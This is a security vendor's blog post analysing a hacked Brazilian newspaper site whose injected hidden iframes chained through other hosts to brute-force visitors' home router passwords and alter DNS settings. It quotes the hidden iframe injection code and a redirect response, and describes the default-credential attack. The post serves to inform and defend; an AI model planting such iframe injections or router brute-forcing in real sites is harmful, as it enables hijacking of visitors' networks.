• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Website Security – Compromised Website Used To Hack Home Routers

September 11, 2014Fioravante Souza

FacebookTwitterSubscribe

What if we told you that a compromised website has the ability to hack your home router?

Yesterday we were notified that a popular newspaper in Brazil (politica.estadao.com.br) was hacked and loading several iframes. These iframes were trying to change the DNS configuration on the victim’s DSL router by Brute Forcing the admin credentials.

Sucuri - Politica NewsPaper Twitter Notification
Sucuri – Politica NewsPaper Twitter Notification

As you can see in the image, the payload was trying the user admin, root, gvt and a few other usernames, all using the router default passwords. Hours after being notified, the website was still compromised so we decided to dig a little deeper.

Below is the payload chain:

Sucuri - Politica iFrame Payload Chain
Sucuri – Politica iFrame Payload Chain

The payload itself is simple, it’s a hidden iframe injection, loading content from:

<iframe style="position:absolute;width:0px;height:0px;" src="http ://www.laspeores. com.ar/.../_/" frameborder="0"></iframe>

Chances are that laspeores.com.ar owner doesn’t know that the website is infected. You see the …? and the underscore directories in the URL? Those are commonly used as way to disguise or evade detection. Nobody would dare mess with DOT and DOT DOT directories, right?

Next it loads a second iframe, now getting the content from a URL shortener site: vv2.com:

<iframe style="position:absolute;width:0px;height:0px;" src="http://vv2 .com/a6n" frameborder="0"></iframe>

Yes, another hidden iframe, and now with JavaScript code. So, as expected for a shortened URL, it redirected us to a third website, now with JavaScript code:

HTTP/1.1 301 Moved Permanently
Date: Wed, 10 Sep 2014 11:11:14 GMT
Server: Apache/2.4.10 (FreeBSD) PHP/5.5.16
X-Powered-By: PHP/5.5.16
Location: http://cect.ut. ee/wordpress/wp-content/js/
Content-Length: 2214
Content-Type: text/html

Here is the Payload:

Sucuri - The Payload
Sucuri – The Payload

This script is being used to identify the local IP address of your computer. It then starts guessing the router IP by passing it as a variable to another script:

http ://cect .ut .ee/wordpress/wp-content/js/?ip=172.16.102.128".

It is publicly available on the internet, there’s nothing malicious on it. You can find a similar function on http://net.ipcalf.com/.

Interestingly enough, this script is not compatible with Internet Explorer, so the attacker had to improvise, using a different approach, the output for IE is like what we saw in the image above. 72 requests hidden as image tags using default passwords, but now instead of targeting possible IP addresses on my local network range, it uses a default list: 192.168.0.1, 192.167.1.1 and the WAN address.

Protect Yourself!

Sometimes it’s easy to forget how powerful the web is.

We often spend time talking to web server infections, and drive-by-downloads, but we rarely talk to the other nefarious acts malicious actors can do. This is but one example of a wide range of actions available to the crackers.

Websites have been the number one distribution mechanism for malware for a while, and now we’re seeing this evolution in attacks. It’s unlikely that this will end soon, as such you have to work hard to be vigilant and prepared. Remember, that your personal online security, is just as important as your website security.

This means that it is all about good posture, good posture reduces risk, and we all know that security is about risk reduction.

The easiest way to address an issue like the one describe above is to move beyond the default user name / password configuration. Odds are many of you unpackage the router, set it up and go about your business. You’re safe, who would want access to your home router? Well, now you know who. Routers are the backbone of the internet, even those of you that you use the internet in your homes.

Be Smart. Be safe.

If you want to get serious, consider disabling the execution of JavaScript on your browsers or disabling play options for objects in the browser.

FacebookTwitterSubscribe

Categories: Website Malware Infections, Website SecurityTags: Phishing

About Fioravante Souza

Fioravante "Fio" Souza is Sucuri’s Vulnerability Research & Machine Learning Manager who joined the company in 2012. Fio’s main responsibilities include dealing with emerging web threats. His professional experience covers 18 years of information security. When Fio isn’t dealing with web threats, you might find him fermenting everything he can find. Connect with Fio on Twitter or Untappd.

Reader Interactions

Comments

  1. Bruno Cassol

    September 11, 2014

    Didn’t realized such attacks could be done. Very interesting article. Thank you for sharing.

  2. Giorgio Maone

    September 11, 2014

    Hi, even if I’m obviously an advocate of browsing the web with JavaScript enabled on trusted sites only, in this case NoScript’s ABE module will protect you by default, even with scripts “globally allowed”.

    See http://hackademix.net/2010/07/28/abe-patrols-the-routes-to-your-routers/

  3. Lucas Zanella

    September 11, 2014

    It’s me in the print :3

  4. Roberto Mascarenhas Braga

    September 11, 2014

    Brasil <3

    At least our hackers have creativity in mind and are reinveting themselves lol

  5. JanR

    September 12, 2014

    Interesting! In 2012, Bogdan Calin from Acunetix wrote a PoC ‘hacking a router through email’, using kind of the same aproach: http://www.acunetix.com/blog/web-security-zone/the-email-that-hacks-you/

  6. james

    November 18, 2014

    Im obliged for the article post.Much thanks again. Fantastic.

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.